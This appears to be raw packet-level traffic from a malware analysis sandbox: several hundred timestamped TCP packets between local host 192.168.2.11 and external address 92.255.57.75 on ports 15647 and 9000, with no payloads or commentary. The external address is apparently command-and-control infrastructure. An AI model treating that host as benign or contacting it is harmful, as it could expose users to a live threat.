Dec 17, 2024 08:40:00.305620909 CET	9000	50002	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.373399973 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.373502970 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.489610910 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.489751101 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.605468988 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.605604887 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.725538969 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.725722075 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.802172899 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.802278996 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:00.917769909 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:00.917948961 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.037468910 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.037663937 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.109715939 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.109818935 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.229702950 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.229870081 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.229962111 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.349493980 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.349606037 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.470758915 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.470828056 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.512737989 CET	9000	50002	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.512789011 CET	9000	50002	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.513010979 CET	50002	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.513190031 CET	50002	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.541382074 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.541461945 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.627459049 CET	50008	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.633546114 CET	9000	50002	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.661345959 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.661448956 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.661643028 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.704431057 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.747402906 CET	9000	50008	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.747479916 CET	50008	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.747684956 CET	50008	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.777580976 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.777664900 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.853485107 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.853900909 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:01.867374897 CET	9000	50008	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.973442078 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:01.979762077 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.089950085 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.090858936 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.165361881 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.165493965 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.285511017 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.285593033 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.291959047 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.345071077 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.477631092 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.477780104 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.597428083 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.597562075 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.669459105 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.669570923 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.789194107 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.789302111 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.909099102 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.909220934 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:02.990631104 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:02.990710974 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.075063944 CET	9000	50008	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.075170994 CET	9000	50008	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.075227022 CET	50008	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.076036930 CET	50008	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.101388931 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.101469994 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.189999104 CET	50014	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.195688963 CET	9000	50008	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.213361979 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.213495970 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.302706957 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.302815914 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.309700966 CET	9000	50014	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.309786081 CET	50014	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.309982061 CET	50014	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.413352966 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.413469076 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.429723978 CET	9000	50014	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.525482893 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.525587082 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.645431995 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.645520926 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.725274086 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.725383043 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.837975979 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.838054895 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:03.957525015 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:03.957662106 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.037447929 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.037589073 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.150250912 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.150387049 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.269448996 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.269824028 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.389534950 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.390870094 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.462285042 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.462887049 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.583405972 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.583575964 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.635231018 CET	9000	50014	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.635358095 CET	9000	50014	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.635474920 CET	50014	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.636116028 CET	50014	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.697443008 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.699887991 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.752085924 CET	50016	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.756009102 CET	9000	50014	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.775405884 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.778017998 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.871793032 CET	9000	50016	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.873933077 CET	50016	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.874437094 CET	50016	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.897396088 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:04.897548914 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:04.995171070 CET	9000	50016	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.012356043 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.012430906 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.088099957 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.088185072 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.210354090 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.210443020 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.332179070 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.332243919 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.402076006 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.402152061 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.523818016 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.523879051 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.524025917 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.633549929 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.633639097 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.715770960 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.715853930 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.835727930 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.835839987 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:05.836430073 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.945425034 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:05.951775074 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.071511984 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.073333979 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.073378086 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.158798933 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.199878931 CET	9000	50016	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.200001955 CET	9000	50016	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.203953028 CET	50016	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.203953028 CET	50016	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.263978958 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.267014980 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.309537888 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.311934948 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.323257923 CET	50021	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.323685884 CET	9000	50016	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.431706905 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.431823015 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.442970037 CET	9000	50021	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.443069935 CET	50021	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.443285942 CET	50021	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.455746889 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.455868959 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.541640997 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.541779041 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.562961102 CET	9000	50021	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.575706005 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.575870037 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.695925951 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.697119951 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.741746902 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.741902113 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.853852034 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.854072094 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.965466976 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.965521097 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:06.973946095 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:06.973992109 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.005373955 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.005438089 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.093760014 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.093835115 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.166310072 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.166403055 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.237312078 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.237390995 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.317573071 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.317648888 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.405463934 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.405535936 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.429263115 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.429331064 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.437608957 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.525207043 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.525276899 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.549273014 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.549460888 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.669224977 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.669286013 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.717983007 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.718071938 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.766227961 CET	9000	50021	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.766257048 CET	9000	50021	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.766360998 CET	50021	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.766483068 CET	50021	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.833605051 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.833738089 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.837166071 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.838013887 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.876979113 CET	50027	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.886099100 CET	9000	50021	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.953600883 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.954767942 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:07.959815025 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:07.996880054 CET	9000	50027	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.000057936 CET	50027	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.000057936 CET	50027	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.029129028 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.035772085 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.079785109 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.079968929 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.120080948 CET	9000	50027	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.145745039 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.145908117 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.155574083 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.199793100 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.200037956 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.265441895 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.265598059 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.266177893 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.319777966 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.320453882 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.385437965 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.385574102 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.391937971 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.392019987 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.481412888 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.481688023 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.505462885 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.505568981 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.511814117 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.625330925 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.625540972 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.632224083 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.634015083 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.753684998 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.753834009 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.793658018 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.793845892 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:08.918492079 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:08.918587923 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.045695066 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.045803070 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.134407997 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.134468079 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.134510040 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.213419914 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.213474035 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.254523039 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.254586935 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.257636070 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.327157974 CET	9000	50027	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.327225924 CET	9000	50027	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.327297926 CET	50027	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.327390909 CET	50027	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.345066071 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.357741117 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.357825994 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.417337894 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.417388916 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.440331936 CET	50029	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.447060108 CET	9000	50027	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.477854967 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.477967978 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.525779009 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.525842905 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.537156105 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.537201881 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.560178995 CET	9000	50029	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.560257912 CET	50029	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.560359955 CET	50029	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.597810984 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.597879887 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.645550013 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.645605087 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.656876087 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.673681021 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.673762083 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.679992914 CET	9000	50029	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.729237080 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.729310036 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.793428898 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.793494940 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.848982096 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.849090099 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.858537912 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.861152887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.901361942 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.901437044 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.913346052 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.913414955 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.968991041 CET	15647	49995	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.971970081 CET	49995	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.984220982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:09.988014936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:09.988167048 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.107777119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.112041950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.231756926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.231945038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.352063894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.354638100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.474814892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.479547024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.601125956 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.607465029 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.727221012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.730818033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.850572109 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.850706100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.886804104 CET	9000	50029	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.886889935 CET	9000	50029	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.887777090 CET	50029	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.888586998 CET	50029	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:10.970457077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:10.970515013 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.002041101 CET	50035	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.008253098 CET	9000	50029	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.090292931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:11.090604067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:11.121774912 CET	9000	50035	92.255.57.75	192.168.2.11
